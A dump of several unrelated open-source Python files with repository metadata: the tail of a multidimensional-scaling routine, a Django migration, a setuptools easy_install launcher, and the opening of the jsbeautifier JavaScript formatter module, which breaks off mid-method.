                fakedist[i][j]=sqrt(sum([pow(loc[i][x]-loc[j][x],2)
                                         for x in range(len(loc[i]))]))
        # Move points
        grad=[[0.0,0.0] for i in range(n)]
        totalerror=0
        for k in range(n):
            for j in range(n):
                if j==k: continue
                # The error is percent difference between the distances
                errorterm=(fakedist[j][k]-realdist[j][k])/realdist[j][k]
                # Each point needs to be moved away from or towards the other
                # point in proportion to how much error it has
                grad[k][0]+=((loc[k][0]-loc[j][0])/fakedist[j][k])*errorterm
                grad[k][1]+=((loc[k][1]-loc[j][1])/fakedist[j][k])*errorterm
                # Keep track of the total error
                totalerror+=abs(errorterm)
        print totalerror
        # If the answer got worse by moving the points, we are done
        if lasterror and lasterror<totalerror: break
        lasterror=totalerror
        # Move each of the points by the learning rate times the gradient
        for k in range(n):
            loc[k][0]-=rate*grad[k][0]
            loc[k][1]-=rate*grad[k][1]
    return loc
def draw2d(data,labels,jpeg='mds2d.jpg'):
    """Render 2D scaledown() locations as a labelled JPEG.

    Coordinates around the [-0.5, 1.5] range are mapped onto a fixed
    2000x2000 canvas; each item is drawn as its label text.
    """
    img=Image.new('RGB',(2000,2000),(255,255,255))
    draw=ImageDraw.Draw(img)
    for i in range(len(data)):
        x=(data[i][0]+0.5)*1000
        y=(data[i][1]+0.5)*1000
        draw.text((x,y),labels[i],(0,0,0))
    img.save(jpeg,'JPEG')
| [
"huzeyfeayaz23@hotmail.com"
] | huzeyfeayaz23@hotmail.com |
f7ba00666a6535fe41c81838590fae2a7a2d6db6 | 457c303283b4bb61e4082dbf6ed54fb46c46a877 | /tracker/migrations/0006_auto_20210122_0811.py | cd95a32e68871fbb70358b43a7c7ceb7c11937c5 | [] | no_license | nhieckqo/apitrack | 9bbe178eb94be932b10c0b658445d5a14294fe60 | ca008756d0ea457c538d21237d422afaa4730fab | refs/heads/main | 2023-02-24T13:12:11.703582 | 2021-01-30T12:41:28 | 2021-01-30T12:41:28 | 333,355,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | # Generated by Django 3.1.2 on 2021-01-22 00:11
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration altering two DateTimeField definitions.

    NOTE(review): the `entry_timestamp` default is a datetime literal frozen
    at the moment the migration was generated (a known artifact of using a
    dynamic default like now() on the model); every row defaulted by this
    migration gets that fixed timestamp.
    """
    dependencies = [
        ('tracker', '0005_auto_20210122_0809'),
    ]
    operations = [
        migrations.AlterField(
            model_name='apiintegrationsummary',
            name='last_active_discussion_date',
            field=models.DateTimeField(),
        ),
        migrations.AlterField(
            model_name='currentstatus',
            name='entry_timestamp',
            field=models.DateTimeField(default=datetime.datetime(2021, 1, 22, 8, 11, 27, 728882)),
        ),
    ]
| [
"nhieckqo9@gmail.com"
] | nhieckqo9@gmail.com |
f5b214a76ce69ee2ac15708f09c2ad0fd7c0da08 | d3f5ee94a9a7bd57d9cb23b5cb547fbf4360ed56 | /venv/bin/easy_install-2.7 | ad5a8621f91433997df407f92ee90d4ac789f88b | [] | no_license | chaiwon59/aws_deeplens_ml | d197f4800682423bcd42deb6b4347dc0f43a0fa7 | 5b07e389cc00cd8a64e28c431b13725585ec1004 | refs/heads/master | 2023-04-21T03:07:19.759244 | 2021-04-22T12:27:54 | 2021-04-22T12:27:54 | 360,510,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 283 | 7 | #!/Users/chaiwonpark/PycharmProjects/machineLearning/venv/bin/python
# -*- coding: utf-8 -*-
"""Console launcher for setuptools' ``easy_install`` command.

Strips any ``-script.py``/``-script.pyw``/``.exe`` wrapper suffix from
``sys.argv[0]`` so the command reports its plain name, then delegates to
setuptools' ``main``.
"""
import re
import sys

from setuptools.command.easy_install import main

if __name__ == '__main__':
    # Normalise the program name before handing control to setuptools.
    _LAUNCHER_SUFFIX = re.compile(r'(-script\.pyw?|\.exe)?$')
    sys.argv[0] = _LAUNCHER_SUFFIX.sub('', sys.argv[0])
    sys.exit(main())
| [
"c.park-3@student.tudelft.nl"
] | c.park-3@student.tudelft.nl |
3e48796bf6d16d0f0492289087cc246a6b7db31d | 10cb51733fd18a6535c681ea26d8548eb1017ea5 | /src/main/resources/static/global/plugins/js-beautify/python/jsbeautifier/__init__.py | f3bf455c3585b8635394dff6f36704bc0bcd1ddc | [
"MIT"
] | permissive | morosainos/MSS_GRADLE | 8489eb156f4dc8fd231d6a079973205f449dd424 | 8cae374b953c4698eb2299e34884a80cc7051705 | refs/heads/master | 2021-01-19T17:33:43.666423 | 2017-06-14T15:15:20 | 2017-06-14T15:15:20 | 88,329,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85,068 | py | from __future__ import print_function
import sys
import os
import getopt
import re
import string
import errno
import copy
from jsbeautifier.__version__ import __version__
#
# The MIT License (MIT)
# Copyright (c) 2007-2013 Einar Lielmanis and contributors.
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Originally written by Einar Lielmanis et al.,
# Conversion to python by Einar Lielmanis, einar@jsbeautifier.org,
# Parsing improvement for brace-less and semicolon-less statements
# by Liam Newman <bitwiseman@gmail.com>
# Python is not my native language, feel free to push things around.
#
# Use either from command line (script displays its usage when run
# without any parameters),
#
#
# or, alternatively, use it as a module:
#
# import jsbeautifier
# res = jsbeautifier.beautify('your javascript string')
# res = jsbeautifier.beautify_file('some_file.js')
#
# you may specify some options:
#
# opts = jsbeautifier.default_options()
# opts.indent_size = 2
# res = jsbeautifier.beautify('some javascript', opts)
#
#
# Here are the available options: (read source)
class BeautifierOptions:
    """Settings bundle controlling how the beautifier formats output.

    All attributes are plain public fields with the defaults below;
    callers mutate them directly before passing the object to
    ``beautify``/``Beautifier``.
    """

    def __init__(self):
        # Populate every option with its documented default in one shot.
        self.__dict__.update(
            indent_size=4,
            indent_char=' ',
            indent_with_tabs=False,
            eol='\n',
            preserve_newlines=True,
            max_preserve_newlines=10,
            space_in_paren=False,
            space_in_empty_paren=False,
            e4x=False,
            jslint_happy=False,
            space_after_anon_function=False,
            brace_style='collapse',
            keep_array_indentation=False,
            keep_function_indentation=False,
            eval_code=False,
            unescape_strings=False,
            wrap_line_length=0,
            break_chained_methods=False,
            end_with_newline=False,
            comma_first=False,
            # For testing of beautify ignore:start directive
            test_output_raw=False,
        )

    def __repr__(self):
        # Keep the exact layout of the historical %-style template,
        # including the [brackets] around indent_char and the trailing
        # newline, in case downstream tooling parses this text.
        template = (
            "indent_size = {0.indent_size}\n"
            "indent_char = [{0.indent_char}]\n"
            "preserve_newlines = {0.preserve_newlines}\n"
            "max_preserve_newlines = {0.max_preserve_newlines}\n"
            "space_in_paren = {0.space_in_paren}\n"
            "jslint_happy = {0.jslint_happy}\n"
            "space_after_anon_function = {0.space_after_anon_function}\n"
            "indent_with_tabs = {0.indent_with_tabs}\n"
            "brace_style = {0.brace_style}\n"
            "keep_array_indentation = {0.keep_array_indentation}\n"
            "eval_code = {0.eval_code}\n"
            "wrap_line_length = {0.wrap_line_length}\n"
            "unescape_strings = {0.unescape_strings}\n"
        )
        return template.format(self)
class BeautifierFlags:
    """Per-mode parser state, pushed/popped as the beautifier enters and
    leaves blocks, expressions, and statements."""

    def __init__(self, mode):
        self.mode = mode
        self.parent = None          # enclosing frame, set via apply_base()
        self.last_text = ''
        self.last_word = ''
        # Boolean statement/flow markers -- all off for a fresh frame.
        for marker in ('declaration_statement', 'declaration_assignment',
                       'multiline_frame', 'if_block', 'else_block',
                       'do_block', 'do_while', 'in_case',
                       'in_case_statement', 'case_body'):
            setattr(self, marker, False)
        # Indentation bookkeeping.
        self.indentation_level = 0
        self.line_indent_level = 0
        self.start_line_index = 0
        self.ternary_depth = 0

    def apply_base(self, flags_base, added_newline):
        """Inherit context from the frame this one is being pushed over.

        When no newline was just emitted, the child also inherits the
        current line's (possibly deeper) indent level.
        """
        if added_newline:
            inherited_level = flags_base.indentation_level
        else:
            inherited_level = max(flags_base.indentation_level,
                                  flags_base.line_indent_level)
        self.parent = flags_base
        self.last_text = flags_base.last_text
        self.last_word = flags_base.last_word
        self.indentation_level = inherited_level
class Acorn:
    """Character-classification helpers ported from the acorn JS parser.

    The tokenizer uses these predicates to decide whether a (possibly
    non-ASCII) code point may start or continue a JavaScript identifier,
    and the regexes to recognise Unicode whitespace and newlines.  The
    large escape strings are data tables taken verbatim from
    acorn/esprima -- do not edit them by hand.
    """
    def __init__(self):
        # This is not pretty, but given how we did the version import
        # it is the only way to do this without having setup.py fail on a missing six dependency.
        self.six = __import__("six")
        # This section of code was translated to python from acorn (javascript).
        #
        # Acorn was written by Marijn Haverbeke and released under an MIT
        # license. The Unicode regexps (for identifiers and whitespace) were
        # taken from [Esprima](http://esprima.org) by Ariya Hidayat.
        #
        # Git repositories for Acorn are available at
        #
        # http://marijnhaverbeke.nl/git/acorn
        # https://github.com/marijnh/acorn.git
        # ## Character categories
        # Big ugly regular expressions that match characters in the
        # whitespace, identifier, and identifier-start categories. These
        # are only applied when a character is found to actually have a
        # code point above 128.
        self.nonASCIIwhitespace = re.compile(self.six.u("[\u1680\u180e\u2000-\u200a\u202f\u205f\u3000\ufeff]"))
        self.nonASCIIidentifierStartChars = self.six.u("\xaa\xb5\xba\xc0-\xd6\xd8-\xf6\xf8-\u02c1\u02c6-\u02d1\u02e0-\u02e4\u02ec\u02ee\u0370-\u0374\u0376\u0377\u037a-\u037d\u0386\u0388-\u038a\u038c\u038e-\u03a1\u03a3-\u03f5\u03f7-\u0481\u048a-\u0527\u0531-\u0556\u0559\u0561-\u0587\u05d0-\u05ea\u05f0-\u05f2\u0620-\u064a\u066e\u066f\u0671-\u06d3\u06d5\u06e5\u06e6\u06ee\u06ef\u06fa-\u06fc\u06ff\u0710\u0712-\u072f\u074d-\u07a5\u07b1\u07ca-\u07ea\u07f4\u07f5\u07fa\u0800-\u0815\u081a\u0824\u0828\u0840-\u0858\u08a0\u08a2-\u08ac\u0904-\u0939\u093d\u0950\u0958-\u0961\u0971-\u0977\u0979-\u097f\u0985-\u098c\u098f\u0990\u0993-\u09a8\u09aa-\u09b0\u09b2\u09b6-\u09b9\u09bd\u09ce\u09dc\u09dd\u09df-\u09e1\u09f0\u09f1\u0a05-\u0a0a\u0a0f\u0a10\u0a13-\u0a28\u0a2a-\u0a30\u0a32\u0a33\u0a35\u0a36\u0a38\u0a39\u0a59-\u0a5c\u0a5e\u0a72-\u0a74\u0a85-\u0a8d\u0a8f-\u0a91\u0a93-\u0aa8\u0aaa-\u0ab0\u0ab2\u0ab3\u0ab5-\u0ab9\u0abd\u0ad0\u0ae0\u0ae1\u0b05-\u0b0c\u0b0f\u0b10\u0b13-\u0b28\u0b2a-\u0b30\u0b32\u0b33\u0b35-\u0b39\u0b3d\u0b5c\u0b5d\u0b5f-\u0b61\u0b71\u0b83\u0b85-\u0b8a\u0b8e-\u0b90\u0b92-\u0b95\u0b99\u0b9a\u0b9c\u0b9e\u0b9f\u0ba3\u0ba4\u0ba8-\u0baa\u0bae-\u0bb9\u0bd0\u0c05-\u0c0c\u0c0e-\u0c10\u0c12-\u0c28\u0c2a-\u0c33\u0c35-\u0c39\u0c3d\u0c58\u0c59\u0c60\u0c61\u0c85-\u0c8c\u0c8e-\u0c90\u0c92-\u0ca8\u0caa-\u0cb3\u0cb5-\u0cb9\u0cbd\u0cde\u0ce0\u0ce1\u0cf1\u0cf2\u0d05-\u0d0c\u0d0e-\u0d10\u0d12-\u0d3a\u0d3d\u0d4e\u0d60\u0d61\u0d7a-\u0d7f\u0d85-\u0d96\u0d9a-\u0db1\u0db3-\u0dbb\u0dbd\u0dc0-\u0dc6\u0e01-\u0e30\u0e32\u0e33\u0e40-\u0e46\u0e81\u0e82\u0e84\u0e87\u0e88\u0e8a\u0e8d\u0e94-\u0e97\u0e99-\u0e9f\u0ea1-\u0ea3\u0ea5\u0ea7\u0eaa\u0eab\u0ead-\u0eb0\u0eb2\u0eb3\u0ebd\u0ec0-\u0ec4\u0ec6\u0edc-\u0edf\u0f00\u0f40-\u0f47\u0f49-\u0f6c\u0f88-\u0f8c\u1000-\u102a\u103f\u1050-\u1055\u105a-\u105d\u1061\u1065\u1066\u106e-\u1070\u1075-\u1081\u108e\u10a0-\u10c5\u10c7\u10cd\u10d0-\u10fa\u10fc-\u1248\u124a-\u124d\u1250-\u1256\u1258\u125a-\u125d\u1260-\u1288\u128a-\u128d\u1290-\u12b0\u12b2-\u12b5\u12b8-\u12be\u12c0\u1
2c2-\u12c5\u12c8-\u12d6\u12d8-\u1310\u1312-\u1315\u1318-\u135a\u1380-\u138f\u13a0-\u13f4\u1401-\u166c\u166f-\u167f\u1681-\u169a\u16a0-\u16ea\u16ee-\u16f0\u1700-\u170c\u170e-\u1711\u1720-\u1731\u1740-\u1751\u1760-\u176c\u176e-\u1770\u1780-\u17b3\u17d7\u17dc\u1820-\u1877\u1880-\u18a8\u18aa\u18b0-\u18f5\u1900-\u191c\u1950-\u196d\u1970-\u1974\u1980-\u19ab\u19c1-\u19c7\u1a00-\u1a16\u1a20-\u1a54\u1aa7\u1b05-\u1b33\u1b45-\u1b4b\u1b83-\u1ba0\u1bae\u1baf\u1bba-\u1be5\u1c00-\u1c23\u1c4d-\u1c4f\u1c5a-\u1c7d\u1ce9-\u1cec\u1cee-\u1cf1\u1cf5\u1cf6\u1d00-\u1dbf\u1e00-\u1f15\u1f18-\u1f1d\u1f20-\u1f45\u1f48-\u1f4d\u1f50-\u1f57\u1f59\u1f5b\u1f5d\u1f5f-\u1f7d\u1f80-\u1fb4\u1fb6-\u1fbc\u1fbe\u1fc2-\u1fc4\u1fc6-\u1fcc\u1fd0-\u1fd3\u1fd6-\u1fdb\u1fe0-\u1fec\u1ff2-\u1ff4\u1ff6-\u1ffc\u2071\u207f\u2090-\u209c\u2102\u2107\u210a-\u2113\u2115\u2119-\u211d\u2124\u2126\u2128\u212a-\u212d\u212f-\u2139\u213c-\u213f\u2145-\u2149\u214e\u2160-\u2188\u2c00-\u2c2e\u2c30-\u2c5e\u2c60-\u2ce4\u2ceb-\u2cee\u2cf2\u2cf3\u2d00-\u2d25\u2d27\u2d2d\u2d30-\u2d67\u2d6f\u2d80-\u2d96\u2da0-\u2da6\u2da8-\u2dae\u2db0-\u2db6\u2db8-\u2dbe\u2dc0-\u2dc6\u2dc8-\u2dce\u2dd0-\u2dd6\u2dd8-\u2dde\u2e2f\u3005-\u3007\u3021-\u3029\u3031-\u3035\u3038-\u303c\u3041-\u3096\u309d-\u309f\u30a1-\u30fa\u30fc-\u30ff\u3105-\u312d\u3131-\u318e\u31a0-\u31ba\u31f0-\u31ff\u3400-\u4db5\u4e00-\u9fcc\ua000-\ua48c\ua4d0-\ua4fd\ua500-\ua60c\ua610-\ua61f\ua62a\ua62b\ua640-\ua66e\ua67f-\ua697\ua6a0-\ua6ef\ua717-\ua71f\ua722-\ua788\ua78b-\ua78e\ua790-\ua793\ua7a0-\ua7aa\ua7f8-\ua801\ua803-\ua805\ua807-\ua80a\ua80c-\ua822\ua840-\ua873\ua882-\ua8b3\ua8f2-\ua8f7\ua8fb\ua90a-\ua925\ua930-\ua946\ua960-\ua97c\ua984-\ua9b2\ua9cf\uaa00-\uaa28\uaa40-\uaa42\uaa44-\uaa4b\uaa60-\uaa76\uaa7a\uaa80-\uaaaf\uaab1\uaab5\uaab6\uaab9-\uaabd\uaac0\uaac2\uaadb-\uaadd\uaae0-\uaaea\uaaf2-\uaaf4\uab01-\uab06\uab09-\uab0e\uab11-\uab16\uab20-\uab26\uab28-\uab2e\uabc0-\uabe2\uac00-\ud7a3\ud7b0-\ud7c6\ud7cb-\ud7fb\uf900-\ufa6d\ufa70-\ufad9\ufb00-\ufb06\ufb13-\ufb17\ufb1d\ufb1f-
\ufb28\ufb2a-\ufb36\ufb38-\ufb3c\ufb3e\ufb40\ufb41\ufb43\ufb44\ufb46-\ufbb1\ufbd3-\ufd3d\ufd50-\ufd8f\ufd92-\ufdc7\ufdf0-\ufdfb\ufe70-\ufe74\ufe76-\ufefc\uff21-\uff3a\uff41-\uff5a\uff66-\uffbe\uffc2-\uffc7\uffca-\uffcf\uffd2-\uffd7\uffda-\uffdc")
        self.nonASCIIidentifierChars = self.six.u("\u0300-\u036f\u0483-\u0487\u0591-\u05bd\u05bf\u05c1\u05c2\u05c4\u05c5\u05c7\u0610-\u061a\u0620-\u0649\u0672-\u06d3\u06e7-\u06e8\u06fb-\u06fc\u0730-\u074a\u0800-\u0814\u081b-\u0823\u0825-\u0827\u0829-\u082d\u0840-\u0857\u08e4-\u08fe\u0900-\u0903\u093a-\u093c\u093e-\u094f\u0951-\u0957\u0962-\u0963\u0966-\u096f\u0981-\u0983\u09bc\u09be-\u09c4\u09c7\u09c8\u09d7\u09df-\u09e0\u0a01-\u0a03\u0a3c\u0a3e-\u0a42\u0a47\u0a48\u0a4b-\u0a4d\u0a51\u0a66-\u0a71\u0a75\u0a81-\u0a83\u0abc\u0abe-\u0ac5\u0ac7-\u0ac9\u0acb-\u0acd\u0ae2-\u0ae3\u0ae6-\u0aef\u0b01-\u0b03\u0b3c\u0b3e-\u0b44\u0b47\u0b48\u0b4b-\u0b4d\u0b56\u0b57\u0b5f-\u0b60\u0b66-\u0b6f\u0b82\u0bbe-\u0bc2\u0bc6-\u0bc8\u0bca-\u0bcd\u0bd7\u0be6-\u0bef\u0c01-\u0c03\u0c46-\u0c48\u0c4a-\u0c4d\u0c55\u0c56\u0c62-\u0c63\u0c66-\u0c6f\u0c82\u0c83\u0cbc\u0cbe-\u0cc4\u0cc6-\u0cc8\u0cca-\u0ccd\u0cd5\u0cd6\u0ce2-\u0ce3\u0ce6-\u0cef\u0d02\u0d03\u0d46-\u0d48\u0d57\u0d62-\u0d63\u0d66-\u0d6f\u0d82\u0d83\u0dca\u0dcf-\u0dd4\u0dd6\u0dd8-\u0ddf\u0df2\u0df3\u0e34-\u0e3a\u0e40-\u0e45\u0e50-\u0e59\u0eb4-\u0eb9\u0ec8-\u0ecd\u0ed0-\u0ed9\u0f18\u0f19\u0f20-\u0f29\u0f35\u0f37\u0f39\u0f41-\u0f47\u0f71-\u0f84\u0f86-\u0f87\u0f8d-\u0f97\u0f99-\u0fbc\u0fc6\u1000-\u1029\u1040-\u1049\u1067-\u106d\u1071-\u1074\u1082-\u108d\u108f-\u109d\u135d-\u135f\u170e-\u1710\u1720-\u1730\u1740-\u1750\u1772\u1773\u1780-\u17b2\u17dd\u17e0-\u17e9\u180b-\u180d\u1810-\u1819\u1920-\u192b\u1930-\u193b\u1951-\u196d\u19b0-\u19c0\u19c8-\u19c9\u19d0-\u19d9\u1a00-\u1a15\u1a20-\u1a53\u1a60-\u1a7c\u1a7f-\u1a89\u1a90-\u1a99\u1b46-\u1b4b\u1b50-\u1b59\u1b6b-\u1b73\u1bb0-\u1bb9\u1be6-\u1bf3\u1c00-\u1c22\u1c40-\u1c49\u1c5b-\u1c7d\u1cd0-\u1cd2\u1d00-\u1dbe\u1e01-\u1f15\u200c\u200d\u203f\u2040\u2054\u20d0-\u20dc\u20e1\u20e5-\u20f0\u2d81-\u2d96\u2de0-\u2dff\u3021-\u3028\u3099\u309a\ua640-\ua66d\ua674-\ua67d\ua69f\ua6f0-\ua6f1\ua7f8-\ua800\ua806\ua80b\ua823-\ua827\ua880-\ua881\ua8b4-\ua8c4\ua8d0-\ua8d9\ua8f3-\ua8f7\ua900-\ua909\ua926-\ua92d\ua930-\ua945\ua9
80-\ua983\ua9b3-\ua9c0\uaa00-\uaa27\uaa40-\uaa41\uaa4c-\uaa4d\uaa50-\uaa59\uaa7b\uaae0-\uaae9\uaaf2-\uaaf3\uabc0-\uabe1\uabec\uabed\uabf0-\uabf9\ufb20-\ufb28\ufe00-\ufe0f\ufe20-\ufe26\ufe33\ufe34\ufe4d-\ufe4f\uff10-\uff19\uff3f")
        self.nonASCIIidentifierStart = re.compile("[" + self.nonASCIIidentifierStartChars + "]")
        self.nonASCIIidentifier = re.compile("[" + self.nonASCIIidentifierStartChars + self.nonASCIIidentifierChars + "]")
        # Whether a single character denotes a newline.
        self.newline = re.compile(self.six.u("[\n\r\u2028\u2029]"))
        # Matches a whole line break (where CRLF is considered a single
        # line break). Used to count lines.
        self.lineBreak = re.compile(self.six.u("\r\n|[\n\r\u2028\u2029]"))
    # Test whether a given character code starts an identifier.
    def isIdentifierStart(self, code):
        """Return True if code point ``code`` may begin a JS identifier.

        ASCII fast paths: '$' (36), 'A'-'Z', '_' (95), 'a'-'z'; anything
        >= 0xAA is checked against the acorn identifier-start table.
        """
        if code < 65:
            return code == 36
        if code < 91:
            return True
        if code < 97:
            return code == 95
        if code < 123:
            return True
        return code >= 0xaa and self.nonASCIIidentifierStart.match(self.six.unichr(code)) != None
    # Test whether a given character is part of an identifier.
    def isIdentifierChar(self, code):
        """Return True if code point ``code`` may continue a JS identifier.

        Same as isIdentifierStart but additionally accepts ASCII digits
        ('0'-'9') and uses the wider identifier-continue table.
        """
        if code < 48:
            return code == 36
        if code < 58:
            return True
        if code < 65:
            return False
        if code < 91:
            return True
        if code < 97:
            return code == 95
        if code < 123:
            return True
        return code >= 0xaa and self.nonASCIIidentifier.match(self.six.unichr(code)) != None
class Token:
    """A single lexical token produced by the tokenizer.

    Attributes mirror the constructor arguments; ``comments_before`` is
    filled in later by the tokenizer, and ``directives`` by the comment
    directive scanner.
    """

    def __init__(self, type, text, newlines=0, whitespace_before='', mode=None, parent=None):
        self.type = type
        self.text = text
        self.comments_before = []  # comment tokens attached in front of this one
        self.newlines = newlines
        self.wanted_newline = newlines > 0
        self.whitespace_before = whitespace_before
        # Fix: honor the ``parent`` argument instead of silently discarding
        # it (previously ``self.parent`` was always set to None even when a
        # parent was passed).  The default keeps prior behavior unchanged.
        self.parent = parent
        # ``mode`` is accepted for call-site compatibility but not stored;
        # the beautifier tracks mode on its BeautifierFlags frames instead.
        self.directives = None
def default_options():
    """Return a fresh BeautifierOptions instance populated with defaults."""
    return BeautifierOptions()
def beautify(string, opts=None):
    """Beautify a JavaScript source string and return the formatted text.

    ``opts`` defaults to a fresh ``default_options()`` instance.  The
    default is now resolved at call time; previously ``default_options()``
    was evaluated once at import time, so every defaulted call shared a
    single mutable options object.
    """
    if opts is None:
        opts = default_options()
    b = Beautifier()
    return b.beautify(string, opts)
def beautify_file(file_name, opts=None):
    """Beautify the contents of ``file_name`` ('-' means stdin).

    Fixes: the input file handle is now closed deterministically via a
    ``with`` block (previously it was left for the garbage collector), and
    ``opts`` defaults to a fresh ``default_options()`` resolved at call
    time instead of a single instance shared across calls.
    """
    if opts is None:
        opts = default_options()
    if file_name == '-':  # stdin (never closed -- we don't own it)
        source = sys.stdin.read()
    else:
        with open(file_name) as stream:
            source = stream.read()
    return beautify(source, opts)
def usage(stream=sys.stdout):
    """Write the command-line help text to ``stream``.

    Returns a shell-style exit status: 1 when the help was sent to
    stderr (the usage-error path), 0 otherwise.
    """
    print("jsbeautifier.py@" + __version__ + """
Javascript beautifier (http://jsbeautifier.org/)
Usage: jsbeautifier.py [options] <infile>
    <infile> can be "-", which means stdin.
    <outfile> defaults to stdout
Input options:
-i, --stdin read input from stdin
Output options:
-s, --indent-size=NUMBER indentation size. (default 4).
-c, --indent-char=CHAR character to indent with. (default space).
-e, --eol=STRING character(s) to use as line terminators. (default newline - "\\n")
-t, --indent-with-tabs Indent with tabs, overrides -s and -c
-d, --disable-preserve-newlines do not preserve existing line breaks.
-P, --space-in-paren add padding spaces within paren, ie. f( a, b )
-E, --space-in-empty-paren Add a single space inside empty paren, ie. f( )
-j, --jslint-happy more jslint-compatible output
-a, --space_after_anon_function add a space before an anonymous function's parens, ie. function ()
-b, --brace-style=collapse brace style (collapse, expand, end-expand)
-k, --keep-array-indentation keep array indentation.
-r, --replace write output in-place, replacing input
-o, --outfile=FILE specify a file to output to (default stdout)
-f, --keep-function-indentation Do not re-indent function bodies defined in var lines.
-x, --unescape-strings Decode printable chars encoded in \\xNN notation.
-X, --e4x Pass E4X xml literals through untouched
-w, --wrap-line-length Attempt to wrap line when it exceeds this length.
NOTE: Line continues until next wrap point is found.
-n, --end_with_newline End output with newline
Rarely needed options:
--eval-code evaluate code if a JS interpreter is
installed. May be useful with some obfuscated
script but poses a potential security issue.
-l, --indent-level=NUMBER initial indentation level. (default 0).
-h, --help, --usage prints this help statement.
-v, --version Show the version
""", file=stream)
    # stderr means we were invoked on the error path.
    return 1 if stream is sys.stderr else 0
class MODE:
    """Namespace of integer constants naming the beautifier's frame kinds."""
    BlockStatement = 0
    Statement = 1
    ObjectLiteral = 2
    ArrayLiteral = 3
    ForInitializer = 4
    Conditional = 5
    Expression = 6
class Beautifier:
def __init__(self, opts = default_options() ):
self.opts = copy.copy(opts)
self.blank_state()
self.acorn = Acorn()
    def blank_state(self, js_source_text = None):
        """Reset all per-run formatting state.

        Strips and remembers any leading whitespace of ``js_source_text``
        as the base indentation, then returns the remaining source (or
        None when no source was given).
        """
        # internal flags
        self.flags = None
        self.previous_flags = None
        self.flag_store = []
        self.tokens = []
        self.token_pos = 0
        # force opts.space_after_anon_function to true if opts.jslint_happy
        if self.opts.jslint_happy:
            self.opts.space_after_anon_function = True
        if self.opts.indent_with_tabs:
            self.opts.indent_char = "\t"
            self.opts.indent_size = 1
        # Allow callers (e.g. the CLI) to pass literal "\n"/"\r" escape
        # sequences for the end-of-line option.
        self.opts.eol = self.opts.eol.replace('\\r', '\r').replace('\\n', '\n')
        self.indent_string = self.opts.indent_char * self.opts.indent_size
        self.baseIndentString = ''
        self.last_type = 'TK_START_BLOCK' # last token type
        self.last_last_text = '' # pre-last token text
        preindent_index = 0;
        if not js_source_text == None and len(js_source_text) > 0:
            # Consume the source's leading spaces/tabs; they become the
            # base indentation prepended to every output line.
            while preindent_index < len(js_source_text) and \
                js_source_text[preindent_index] in [' ', '\t'] :
                self.baseIndentString += js_source_text[preindent_index]
                preindent_index += 1
            js_source_text = js_source_text[preindent_index:]
        # NOTE: Output is defined elsewhere in this module.
        self.output = Output(self.indent_string, self.baseIndentString)
        # If testing the ignore directive, start with output disable set to true
        self.output.raw = self.opts.test_output_raw;
        self.set_mode(MODE.BlockStatement)
        return js_source_text
    def beautify(self, s, opts = None ):
        """Tokenize source string ``s`` and return the beautified text.

        When ``opts`` is given it replaces (a copy of) this instance's
        options.  Raises Exception for an unknown ``brace_style``.
        """
        if opts != None:
            self.opts = copy.copy(opts)
        if self.opts.brace_style not in ['expand', 'collapse', 'end-expand', 'none']:
            raise(Exception('opts.brace_style must be "expand", "collapse", "end-expand", or "none".'))
        s = self.blank_state(s)
        input = self.unpack(s, self.opts.eval_code)
        # Dispatch table: one handler per token type.
        self.handlers = {
            'TK_START_EXPR': self.handle_start_expr,
            'TK_END_EXPR': self.handle_end_expr,
            'TK_START_BLOCK': self.handle_start_block,
            'TK_END_BLOCK': self.handle_end_block,
            'TK_WORD': self.handle_word,
            'TK_RESERVED': self.handle_word,
            'TK_SEMICOLON': self.handle_semicolon,
            'TK_STRING': self.handle_string,
            'TK_EQUALS': self.handle_equals,
            'TK_OPERATOR': self.handle_operator,
            'TK_COMMA': self.handle_comma,
            'TK_BLOCK_COMMENT': self.handle_block_comment,
            'TK_COMMENT': self.handle_comment,
            'TK_DOT': self.handle_dot,
            'TK_UNKNOWN': self.handle_unknown,
            'TK_EOF': self.handle_eof
        }
        # NOTE: Tokenizer is defined elsewhere in this module.
        self.tokens = Tokenizer(input, self.opts, self.indent_string).tokenize()
        self.token_pos = 0
        while not self.get_token() == None:
            local_token = self.get_token()
            for comment_token in local_token.comments_before:
                # The cleanest handling of inline comments is to treat them as though they aren't there.
                # Just continue formatting and the behavior should be logical.
                # Also ignore unknown tokens. Again, this should result in better behavior.
                self.handle_token(comment_token)
            self.handle_token(local_token)
            # Shift the last-token bookkeeping after each token is emitted.
            self.last_last_text = self.flags.last_text
            self.last_type = local_token.type
            self.flags.last_text = local_token.text
            self.token_pos += 1
        sweet_code = self.output.get_code()
        if self.opts.end_with_newline:
            sweet_code += '\n'
        # Translate line terminators only once, on the final text.
        if not self.opts.eol == '\n':
            sweet_code = sweet_code.replace('\n', self.opts.eol)
        return sweet_code
    def handle_token(self, local_token):
        """Emit preserved newlines for ``local_token``, then dispatch it.

        Inside arrays with keep_array_indentation every original newline is
        replayed; otherwise the count is clamped to max_preserve_newlines
        and only blank lines (newlines > 1) are preserved.
        """
        newlines = local_token.newlines
        keep_whitespace = self.opts.keep_array_indentation and self.is_array(self.flags.mode)
        if keep_whitespace:
            for i in range(newlines):
                self.print_newline(i > 0)
        else: # not keep_whitespace
            if self.opts.max_preserve_newlines != 0 and newlines > self.opts.max_preserve_newlines:
                newlines = self.opts.max_preserve_newlines
            if self.opts.preserve_newlines and newlines > 1:
                self.print_newline()
                for i in range(1, newlines):
